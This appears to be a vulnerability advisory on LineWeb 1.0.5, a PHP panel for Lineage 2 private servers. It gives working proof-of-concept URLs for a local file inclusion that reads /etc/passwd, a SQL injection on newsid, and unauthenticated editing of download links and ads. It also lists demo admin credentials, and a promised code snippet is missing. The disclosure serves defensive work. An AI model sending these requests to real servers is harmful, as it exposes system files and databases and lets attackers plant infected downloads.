|
|
LineWeb it's a web-app to manage Lineage 2 private severs, a very known mmorpg, and allows to do action such as:=0D
=0D
Main Features:=0D
- Register=0D
- Login=0D
- Quick Login Function=0D
- Quick statistics function (server status, game server status, online players)=0D
- Statistics (login server status, game server status, players online, total accounts, total characters, total gm characters, total clans)=0D
=0D
Administrator Features:=0D
- (NEW) New administrator skin=0D
- (NEW) New server settings (Edit server settings, server rates, specs etc)=0D
- (NEW) New website settings (Title, Note from the management, Contact Email, Rankings Limit)=0D
- (NEW) Ads Management (Add, Edit & Delete)=0D
- News management (add, edit & delete)=0D
- Download management (add, edit & delete)=0D
- Login=0D
- Add administrator=0D
- Logout (of course)=0D
=0D
Member Panel Features:=0D
- Automaticly views all your current characters when you login (name, level, kills etc)=0D
- Change account password=0D
- Delete account=0D
- Logout=0D
=0D
=0D
Live Demo Front : http://demo.l2web.org/=0D
Live Demo Admin : http://demo.l2web.org/admin/=0D
=0D
Demo Administrator Login:=0D
user : demo=0D
password : demo123=0D
=0D
=0D
LFI:=0D
=0D
We can found this part of code on index.php=0D
=0D
=0D
=0D
=0D
Wich allows us to include local files on index.php by using the $op variable, IE: http://localhost/Lineage ACM/lineweb_1.0.5/index.php?op=../../../../../../../etc/passwd=0D
=0D
=0D
We also can find this vuln. in /admin/index.php, IE:=0D
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd=0D
=0D
**************************************************=0D
=0D
Strange behavior on op=register:=0D
=0D
If we register a username twice, IE: username=o&password=12345&confirmpassword=12345&email=&submit2=Register=0D
We get: =0D
The username already exists.=0D
=0D
But if we send a long string twice, IE:=0D
username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaao&password=12345&confirmpassword=12345&email=&submit2=Register=0D
=0D
We get:=0D
Duplicate entry 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' for key 'PRIMARY'=0D
=0D
=0D
=0D
=BFSQL Injection?=0D
=0D
In admin/edit_news.php we can find this source:=0D
=0D
65 elseif(isset($_GET['newsid']))=0D
66 {=0D
67 =0D
68 $result = mysql_query("SELECT * FROM news WHERE newsid='" . $_GET['newsid'] . "'");=0D
69 while($myrow = mysql_fetch_array($result))=0D
70 {=0D
71=0D
=0D
We can observe that it doesn't make any check at all any input that we make on $newsid, so if we inject a " ' " in:=0D
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27=0D
We get:=0D
=0D
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\wamp\www\Lineage ACM\lineweb_1.0.5\admin\edit_news.php on line 69=0D
We can find this vuln in: edit_news.php ; edit_downloads.php y edit_ads.php. =0D
It requires magic_quotes = OFF=0D
=0D
**************************************************=0D
=0D
Edit without permission:=0D
=0D
edit_downloads.php allows us to edit any download link, without any verification at all. By doing this, we could trick the user to download an infected file.=0D
=0D
The same happens on edit_ads.php, if we give to our URL values to ad_name y ad_content, we could get without any verification, permission to edit news:=0D
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA=0D
=0D
By doing this we could make a HTML, XSS or CSS injection.=0D
=0D
Ignacio Garrido,=0D
=0D
Argentina.